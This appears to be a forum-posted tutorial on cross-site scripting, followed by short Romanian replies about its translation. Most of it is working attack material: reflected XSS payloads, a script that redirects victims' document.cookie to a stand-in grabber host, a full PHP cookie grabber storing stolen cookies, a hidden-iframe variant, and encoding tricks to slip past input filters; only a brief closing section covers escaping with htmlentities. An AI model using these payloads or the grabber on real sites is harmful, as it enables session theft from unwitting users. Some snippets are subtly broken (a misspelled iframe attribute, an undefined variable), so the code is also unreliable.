About Cross Site Scripting (XSS)

[Dragos]

About Cross Site Scripting

Author: Synthesis

Website: www.rstcenter.com

1. Introduction

This article is dedicated to a web vulnerability called Cross Site Scripting. The examples throughout the article are created in Cascading Style Sheet (CSS), HyperText Markup Language (HTML), Hypertext Preprocessor (PHP), JavaScript (JS) and Visual Basic Script (VBScript).

2. Definition

Cross Site Scripting (abbreviated XSS) is a Web vulnerability that allows the user to enter a personal script into a webpage. This script may affect other users that are seeing the infected page (client-side vulnerability). This vulnerability is dangerous only when the code affects cookies or sessions.

2.1 About cookies

A cookie is a piece of text, often encrypted, sent by a server to a web browser. This web browser receives the cookie and sends it back unchanged whenever the user accesses that server.

Overall, a cookie can be viewed as a key to log on that server. Cookies are usually created after the user has logged on a site.

After stealing a cookie from the victim, the attacker can use it to authenticate on the site with the victim's identity. The cookies can be reached easily using JavaScript.

A cookie grabber is mostly used to capture cookies. The cookie grabber is a script that receives the victims's cookies through GET and stores them in a database.

2.2 Types of XSS

There are two types of XSS.

2.2.1 Non-persistent XSS

The non-persistent XSS (also known as reflected or temporary XSS) is an XSS that affects the user only if he accesses the infected site. This type of XSS is the most common.

Let's take as an example a site's search engine. In some cases, when it doesn't find what the user requested, it displays a message like <?php echo $_GET['q']; ?> was not found. Because the search engine displays the information requested by the user unfiltered, we can enter various codes tot infect the page.

2.2.2 Persistent XSS

The persistent/stored/permanent XSS is an XSS which is stored by the site. This type of XSS is the most dangerous because the script is entered once and it affects the other users as long as the script remains on the page.

Most often, we find persistent XSS in the sites that offer the latest searches.

3. How does an XSS occur?

An XSS occurs when the code is not filtered (or filtered wrong). Most times, the page is reading a variable through GET, then displays its value in a web browser. There are also XSS via POST, but is slightly more difficult to exploit.

4. Exploiting an XSS through GET

Let's consider the following code:

<form action="" method="GET">
<input type="text" value="" name="text">
<input type="submit" value="Search">
</form>
<?php
echo stripslashes($_GET['text']);
?>

The code above is a form with a box and a button. After you write something in the input box and click the Search button, the form sends the information to a PHP code that takes it as yourpage.php?text=InformationFromForm and displays it.

How can we exploit this form?

4.1 Inserting a JavaScript code in the form

JavaScript is an object-oriented programming language. It is used to introduce different features in a web page. JavaScript has the advantage that it can run on your computer, without requiring an Internet connection.

In the form above, we can insert any JavaScript code. This script will be executed as soon as we hit the Search button. For example, if we insert the code below into the form, the web browser will display an alertbox with the text Message.

<script language="JavaScript">alert("Message")</script>

4.1.1 Cookie grabber

As I said earlier, a cookie can be stolen using a cookie grabber.

In order to steal a cookie, the attacker must create a redirect to his cookie grabber. In this case we can use document.location:

<script language="JavaScript">document.location="http://www.site.com/cookiegrabber/index.php?victimcookie="+document.cookie;</script>

Now, how does a cookie grabber work? Easy! The PHP code takes the information using GET (in the example above victimcookie) and saves it in a database.

A cookie grabber example for the code above:

<?php
/* Cookie Grabber Example */

// MySQL database connection
$host = 'localhost';
$name = 'root';
$password = 'password';
$database = 'database1';

// Connecting to the database
$connect = mysql_connect($host, $name, $password) or die(mysql_error());
mysql_select_db($database) or die(mysql_error());

// Taking the cookie using GET
$cookie = $_GET['victimcookie'];

// Victim's referer
$referer = $HTTP_REFERER;

// Conditional statements
if ($cookie == "") {
    header( 'Location: http://www.google.com/' ); // If the user accesses the page and GET is empty, we will be redirected to Google
}else{
    mysql_query("INSERT INTO Cookies (Cookie, Link) VALUES ('$cookie','$referer')"); // We insert the cookie and the referer into the database
    mysql_close($connect); // We close the connection to the database
header( 'Location: http://www.google.com/' ); // We redirect the user to Google
}
?>

There is a chance for the victim to notice that the link is not completely OK, so he may not enter the link. But no problem! We can use an iframe:

<iframe scr="http://site.com/script.php?text=<script>document.location.href='ht tp://server2.com/grabber.php?cookie='+escape(document.cookie)</script>" width="0" height="0">

4.2 Inserting a VBScript code in the form

VBScript is a programming language created by Microsoft, which underlies the ASP programming language. VBScript is executed only on Internet Explorer browser.

To display the same alertbox as above we write the following code in the form and click the Search button:

<script language="VBScript">MsgBox "Message"</script>

4.3 Inserting a CSS code in the form

CSS is used for formatting HTML documents.

We have the CSS code below to display the alertbox with the text Message (as above).

<style type="text/css">body{background-image: url('javascript:alert("Message");');}</style>

XSS using CSS is old and works only on older browsers such as Internet Explorer 6.

4.4 Ways to encode your personal script

There are several ways to encrypt your personal script to place it in a vulnerable form. I'll show you below three known methods.

4.4.1 Hexadecimal

Hexadecimal is a positional numeral system with a radix, or base, of 16. It uses sixteen distinct symbols, most often the symbols 0–9 to represent values zero to nine, and A, B, C, D, E, F (or alternatively a through f) to represent values ten to fifteen.

Sometimes, when inserting an information into a form (search form, logging form, etc..), the script checks if the information submitted contains certain strings such as "<script>", "alert", "document.location", "window.location " or others.

We can replace these strings with their value in hex system. The PHP function below converts any string in hexadecimal system.

<?php
function code_hex($sir)
{
    $hex='';
    for ($i=0; $i < strlen($sir); $i++)
    {
        $hex .= dechex(ord($sir[$i]));
    }
    return $hex;
}
?>

4.4.2 Unicode

Unicode is an encoding format for storage and interpretation of texts on media information.

It is used for encoding JavaScript scripts. We have below a JavaScript function that converts the script to Unicode using charCodeAt.

<script type="JavaScript"> 
function encode_Unicode(string)
{
        if (string == "")
        {
          alert('The string can not be NULL.')
        }
        else
        {
	syn = "String.fromCharCode("
	for (i=0;i<string.length;i++)
	{
		inceput+=string.charCodeAt(i)+","
	}
	syn = syn.substring(0,syn.length-1)
	syn += ")"
	return syn;
        }
}
</script>

4.4.3 Double Encoding

This method consists of double encoding the personal code in order to bypass security filters or to execute certain commands.

We can bypass the security filters due to the server that decodes the information once. The second part of decoding is done by the backend platforms or modules which usually have no security checks.

This technique is not used only to XSS, but also at other types of web attacks such as LFI and RFI.

Let's consider the following JavaScript code:

<script>alert("Message")</script>

First, we convert the HTML chars to hex.

%3Cscript%3Ealert%28%22Message%22%29%3C%2Fscript%3E

The sign for double encoding is %. In hexadecimal system it is represented by %25. So we add %25 at every HTML char. The code will be:

%253Cscript%253Ealert%2528%2522Message%2522%2529%253C%252Fscript%253E

4.5 Other ways to exploit an XSS

There are many methods for exploiting an XSS..

4.5.1 XSS using IMG tag

<IMG SRC=javascript:alert("Message");>
<IMG SRC=vbscript:msgbox("Message");>

4.5.2 XSS imported from another site

<SCRIPT SRC=http://www.site.com/xss.js></SCRIPT>

The file xss.js contains:

alert ("Message");

4.5.3 Malformed HTML tags

<IMG src="""><SCRIPT>alert("Message")<%2FSCRIPT>">

5. Methods to protect ourselves from XSS

XSS can be easily repaired.

PHP provides two functions that do the same thing: htmlentities and htmlspecialchars. These functions convert special characters like "<", ">", "&" and quotes in HTML entities. So, the browser will return the text, but won't execute the personal code.

Let's add one of this functions to the form above:

<form action="" method="GET">
<input type="text" value="" name="text">
<input type="submit" value="Search">
</form>
<?php
echo htmlentities((stripslashes($_GET['text'])),  ENT_QUOTES);
?>

6. Ending

In this article we talked about what is an XSS, how many types of XSS are there, how can we exploit an XSS and how can we protect ourselves from XSS. If you have questions, send me an email to the address listed at the beginning.

Edited June 4, 2011 by Dragos

[nedo]

ce s-a intamplat cu articolul asta? mai devreme era un pic diferit + ca exista un link catre un pdf cu acest articol, link-ul respectiv nu il mai vad

le1: sry.. din nou neatentia ma invinge.... nu am observat ca primul a fost in romana si asta e in engleza ....

Edited August 28, 2010 by nedo

[Dragos]

ce s-a intamplat cu articolul asta? mai devreme era un pic diferit + ca exista un link catre un pdf cu acest articol, link-ul respectiv nu il mai vad

Ba omule, am tradus tutorialul in engleza. Tutorialul original cu PDF il gasesti la sectiunea Tutoriale in romana.